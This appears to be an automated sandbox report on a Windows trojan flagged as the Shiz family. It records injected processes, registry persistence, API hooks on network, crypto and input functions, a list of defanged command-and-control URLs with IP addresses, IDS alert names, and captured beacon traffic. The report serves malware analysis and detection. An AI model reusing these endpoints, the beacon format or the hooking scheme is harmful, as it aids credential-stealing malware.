MD5: c7f6de3628ab6a3add61ad78a209e742
SHA1: 2c7fef251672220f6b3b75a5f6874692c27c07a9
SHA256: e6e8917ae8e817dc188107ee47297fae68fff632cd77f607cc592436e302cfb9
SSDeep: 6144:iesVRRuMOteGgex1JhEc9otunrGuSnKou8I:iesVRRZOteCJb9Wurcu8I
Size: 279880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1996-10-11 00:46:34
Analyzed on: WindowsXPESX SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912
%original file name%.exe:1500

The Trojan injects its code into the following process(es):

winlogon.exe:716
Explorer.EXE:840

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
%System%\config\software (1609 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7E.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB C4 28 90 5D 83 6B 13 3E 56 5E 65 05 DF 12 55"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\hwcmqr.exe_, \??\%WinDir%\apppatch\hwcmqr.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöJîp>¢°oD¬<»¹œ³ŒQ\´òd¼Œ¤Kô1,Å $ë›ÛÌ«”¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’
#»Û:ÑU„„ԝ\±ª²Dƒuœ¡Ü¼);¼\ƒtµ2”kDù”a”*›cü$}Sô|ë$¤ô{¬q³#sÅå\yuJÛËu©|ù
¢rKã!$’‹‹b±ÃÄ£ãÍ‚“ÉUcdÁÄZ¡r»ô”)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*â„¢ü›ÙóÍÁ=éÔÑщ¬
q9|áíù’‘íÁ©šÄR"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Trojan installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

VersionInfo

Company Name: Emsi Software GmbH
Product Name: Linsang
Product Version: 2.2.5.6
Legal Copyright: Sphingometer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.7.8.6
File Description: gladless
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://galin.eu/login.php	91.195.240.135
hxxp://lyman.eu/login.php	81.2.194.128
hxxp://galor.eu/login.php	79.96.182.129
hxxp://lykef.eu/login.php	86.124.164.25
hxxp://ganiq.eu/login.php	46.249.43.105
hxxp://sedoparking.com/login.php
hxxp://gatun.eu/login.php	178.210.94.54
hxxp://gadoc.eu/login.php	176.221.32.120
hxxp://lyset.eu/login.php	91.212.28.29
hxxp://purol.eu/login.php	82.165.106.203
hxxp://pumot.eu/login.php	217.160.64.207
hxxp://volym.eu/login.php	194.9.94.79
hxxp://purac.eu/login.php	62.197.128.123
hxxp://vocom.eu/login.php	109.235.63.103
hxxp://lykil.eu/login.php	194.9.94.235
hxxp://ganar.eu/login.php	72.52.4.120
hxxp://lysen.eu/login.php	89.31.143.6
hxxp://lyxos.eu/login.php	89.31.143.12
hxxp://vocer.eu/login.php	85.13.129.76
hxxp://vonak.eu/login.php	62.182.63.62
hxxp://ganed.eu/login.php	46.28.105.107
hxxp://galik.eu/login.php	185.51.65.84
hxxp://volez.eu/login.php	78.47.242.93
hxxp://www.gss.dr.dk/login.php
hxxp://purex.eu/login.php	149.216.106.61
hxxp://corporate.evonik.com/en/	149.216.106.100
hxxp://corporate.evonik.com/en/Pages/default.aspx	149.216.106.100
hxxp://gatic.eu/login.php	165.160.13.20
hxxp://qexer.eu/login.php	217.146.69.17
hxxp://gacek.eu/login.php	77.55.97.141
hxxp://gadak.eu/login.php	209.140.30.61
hxxp://gater.eu/login.php	62.149.128.154
hxxp://lyken.eu/login.php	194.9.94.86
hxxp://lymos.eu/login.php	195.8.208.58
hxxp://www.gater.eu/login.php	62.149.128.45
hxxp://galev.eu/login.php	66.96.131.56
hxxp://purel.eu/login.php	85.13.132.239
hxxp://lyran.eu/login.php	46.30.212.173
hxxp://galen.eu/login.php	109.235.63.103
hxxp://vocab.eu/login.php	109.235.63.103
hxxp://www.dr.dk/login.php	159.20.6.22
hxxp://volar.eu/login.php	109.235.63.103
hxxp://www.vocer.org/login.php	85.13.129.76
hxxp://www.galin.eu/login.php	72.52.4.90
galip.eu	91.33.209.210
www.bing.com	204.79.197.200

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.

Traffic

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: header

Location: hXXp://VVV.dr.dk/login.php

Connection: close

Vary: Accept-Encoding

Content-Length: 0

Content-Type: text/html

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyset.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Set-Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a; path=/

Content-Length: 1645

Connection: close

Content-Type: text/html
<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html.     PU
BLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".     "hXXp://VVV.w3.org/
TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#
internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/
1999/xhtml">.<head>...<meta http-equiv="Content-Type" cont
ent="text/html; charset=utf-8" />..<meta name="robots" content="
noindex, follow" />...<title>TYPO3 Error</title>...<
base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="t
ypo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />
.</head>..<body class="t3-message-page t3-errorpage-message"&
gt;..<div class="t3-message-page-container">..<div class="t3-
message-page-logo">...<img src="typo3/sysext/t3skin/images/login
/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..&
lt;div class="shadow-box-top-428"></div>..<div class="t3-m
essage-page-message typo3-message message-error">...<h1>Page 
Not Found</h1>...<p class="t3-error-text">Reason: File &qu
ot;login.php" was not found (2)!</p>..</div>..<div
 class="shadow-box-bottom-424"></div>.</div>..<div i
d="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an 
open source content management system. To maintain the quality of the 
system and to improve it, please help us by donating....TYPO3 CMS. Cop
yright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of 
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:36 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

Set-Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>galen.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>two
 thousand, four hundred and ninety-nine</b></p>.          
                      <p>Domain Punycode:<br/><b class=
"punycode">galen.eu</b></p>.                <p>Pa
yment options:</p><p class="paymentimg">.                 
   <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.
png" alt="Buy and register a domain with VISA" title="Buy and register
 a domain with VISA" />.                    <img style="height:2
8px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="border:0;" src="http:/
/galen.eu/images/payment/mastercard.png" alt="Buy and register a domai
n with Mastercard" title="Buy and register a domain with Mastercard" /
>.                    <img style="height:28px;" src="hXXp://gale
n.eu/images/payment/mastercard_securecode.png" alt="Buy and register a
 domain with Mastercard" title="Buy and register a domain with Mas
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatic.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Connection: close

Date: Mon, 10 Nov 2014 20:01:28 GMT

Content-Length: 94

X-Powered-By: Servlet/2.4 JSP/2.0
<html><head><title></title><meta name="revi
sed" content="1.1.7" /></head><body></body></h
tml>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volar.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>volar.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
volar.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://volar.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://volar.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://volar.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gater.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:31 GMT

Server: Apache

Location: hXXp://VVV.gater.eu/login.php

Content-Length: 237

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXp://VVV.gater.eu/login.php">here&l
t;/a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadoc.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<p>Additionally,
 a 404 Not Found.error was encountered while trying to use an ErrorDoc
ument to handle the request.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyman.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:00:57 GMT

Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a

Connection: close

Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>..<head>..<title>The domain name is registered
</title>..<meta http-equiv="Content-Type" content="text/html;
 charset=windows-1250">..<meta name="description" content="FORPS
I je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, server
hostingu, registrace dom.nov.ch jmen a www str.nky na serverech Window
s/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom
.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wif
i,wi-fi,domain,domains">..<style type="text/css">..<!--..h
tml, body {...margin: 0px;...padding: 0px;...height: 100%;...backgroun
d-color: #32549c;..}..#container {...height: 100%;...width: 100%;...te
xt-align: center;..}..#box {...width: 520px;...position: relative;...m
argin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background
-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...backg
round-repeat: no-repeat;...background-position: left top;...padding: 2
0px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-siz
e: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: rel
ative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...
background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, A
rial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..
.#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {..
.font-family: Verdana, Arial, Helvetica, sans-serif;...font-size: 
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocom.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:15 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>vocom.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
vocom.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://vocom.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://vocom.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocom.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:16 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>vocom.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
vocom.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://vocom.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://vocom.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykef.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Mon, 10 Nov 2014 20:00:40 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 4

Connection: close
'OK'..

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyxos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: ud_standard

Vary: Accept-Encoding

Content-Length: 3207

Connection: close

Content-Type: text/html
<html>.<head>.<meta name="keywords" content=">">.
<meta name="description" content="Hier entsteht ">.<meta http
-equiv="Content-Type" content="text/html; charset=UTF-8">.<title
></title>.<style type="text/css">.html, body {..height:
100%;..margin: 0;..padding: 0;..background-color: #FFF;..font-family: 
Arial, Verdana, sans-serif;..color: #444;.}..body { text-align: center
;}...a:link,.a:hover,.a:visited,.a:focus {..margin: 0;..padding: 0;..b
order: none;.}...dvLink:link, .dvLink:hover, .dvLink:visited, .dvLink:
focus {..background: url("hXXp://VVV.united-domains.de/images/vorlagen
/vorlage_pfeil.png") left center no-repeat;.    border: 0 none;.    fo
nt-weight: normal;.    1margin-top: 5px;.    padding-left: 12px;.    t
ext-decoration: underline;.    color: #444;.}...dvLink:hover {..color:
 #003D86;..text-decoration: underline;.}..#wrapper-vorlage {..font-fam
ily: Arial, Verdana, sans-serif;..background: url("hXXp://VVV.united-d
omains.de/images/vorlagen/vorlage_hg.png") repeat-x;..width: 100%;..he
ight: 100%;.}..#vorlage {..width: 450px;..margin: 0 auto;..text-align:
 center;..min-height: 500px;.}..#logo {.    border: none;.    padding-
top: 57px;.    margin: 0;.}..#logo img {.    border: none;.}..#title {
..font-size: 18px;..color: #003d86;.    padding-top: 29px;.    margin:
 0;.}..#content {..background: url("hXXp://VVV.united-domains.de/image
s/vorlagen/vorlage_kugel.png") 260px 150px transparent no-repeat;..fon
t-size: 14px;..line-height: 18px;..margin-top: 23px;..padding: 29p
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyset.eu

Content-Length: 9

Pragma: no-cache

Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Set-Cookie: fe_typo_user=e8e31fcf457afc81edea23504d0c1def; path=/

Content-Length: 1645

Connection: close

Content-Type: text/html
<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html.     PU
BLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".     "hXXp://VVV.w3.org/
TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#
internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/
1999/xhtml">.<head>...<meta http-equiv="Content-Type" cont
ent="text/html; charset=utf-8" />..<meta name="robots" content="
noindex, follow" />...<title>TYPO3 Error</title>...<
base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="t
ypo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />
.</head>..<body class="t3-message-page t3-errorpage-message"&
gt;..<div class="t3-message-page-container">..<div class="t3-
message-page-logo">...<img src="typo3/sysext/t3skin/images/login
/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..&
lt;div class="shadow-box-top-428"></div>..<div class="t3-m
essage-page-message typo3-message message-error">...<h1>Page 
Not Found</h1>...<p class="t3-error-text">Reason: File &qu
ot;login.php" was not found (2)!</p>..</div>..<div
 class="shadow-box-bottom-424"></div>.</div>..<div i
d="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an 
open source content management system. To maintain the quality of the 
system and to improve it, please help us by donating....TYPO3 CMS. Cop
yright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of 
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galik.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT

ETag: "1007b4-70e-50225bda086dd"

Accept-Ranges: bytes

Content-Length: 1806

Vary: Accept-Encoding

Connection: close

Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN".   "
hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<h
ead>.    <title>ERROR 404 - Not Found!</title>.    <
meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
;.    <meta name="robots" content="noindex" />.    <style typ
e="text/css"><!--.    body {.        color: #444444;.        bac
kground-color: #EEEEEE;.        font-family: 'Trebuchet MS', sans-seri
f;.        font-size: 80%;.    }.    h1 {}.    h2 { font-size: 1.2em; 
}.    #page{.        background-color: #FFFFFF;.        width: 60%;.  
      margin: 24px auto;.        padding: 12px;.    }.    #header {.  
      padding: 6px ;.        text-align: center;.    }.    .status3xx 
{ background-color: #475076; color: #FFFFFF; }.    .status4xx { backgr
ound-color: #C55042; color: #FFFFFF; }.    .status5xx { background-col
or: #F2E81A; color: #000000; }.    #content {.        padding: 4px 0 2
4px 0;.    }.    #footer {.        color: #666666;.        background:
 #f9f9f9;.        padding: 10px 20px;.        border-top: 5px #efefef 
solid;.        font-size: 0.8em;.        text-align: center;.    }.   
 #footer a {.        color: #999999;.    }.    --></style>.&l
t;/head>.<body>.    <div id="page">.        <div id=
"header" class="status4xx">.            <h1>ERROR 404 - Not F
ound!</h1>.        </div>.        <div id="content"
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacek.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:30 GMT

Content-Type: text/html

Connection: close

Accept-Ranges: bytes

Vary: Accept-Encoding

Server: Apache/2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.
<HEAD>.<meta http-equiv="Content-Type" content="text/html; ch
arset=iso-8859-2">.<meta http-equiv="Content-Language" content="
pl">..<style type="text/css">.. body {font-family: arial; bac
kground: #ffffff; font-size: 8px color: white;}.. td { font-family: ve
rdana; font-size: 11px;color: black; }.. p { font-family: verdana; fon
t-size: 18px; color: black; text-align: center;}... a:hover {text-deco
ration: none; color: white}.</style>.<TITLE>.(none).</T
ITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<
div style="text-align:center;">.<br>.<table width="100%" b
order="0" cellpadding="0" cellspacing="0" style="align: center">.&l
t;tr><td style="width: 100%" align="center">..<table width
="574" style="background-image:url(/errordocs/pasek.gif); height: 21px
;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<
;td style="text-align: left">....<div style="margin-left:45px"&g
t;<b>Error</b></div>....</td>...</tr>...
</table>..<table width="574" border="0" cellpadding="1" cells
pacing="1" style="background-color: #9c9c9c;text-align:center;">...
<tr>....<td style="background-color: #ffffff">.....<br&
gt;.....<table style="background-color: #ffffff">......<tr>
;.......<td align="center" valign="top"><IMG SRC="/errordocs/
error.gif"  ALT="eroor"></td>.......<td colspan="2" al
<<< skipped >>>

GET /en/ HTTP/1.0

Referer: hXXp://VVV.google.com

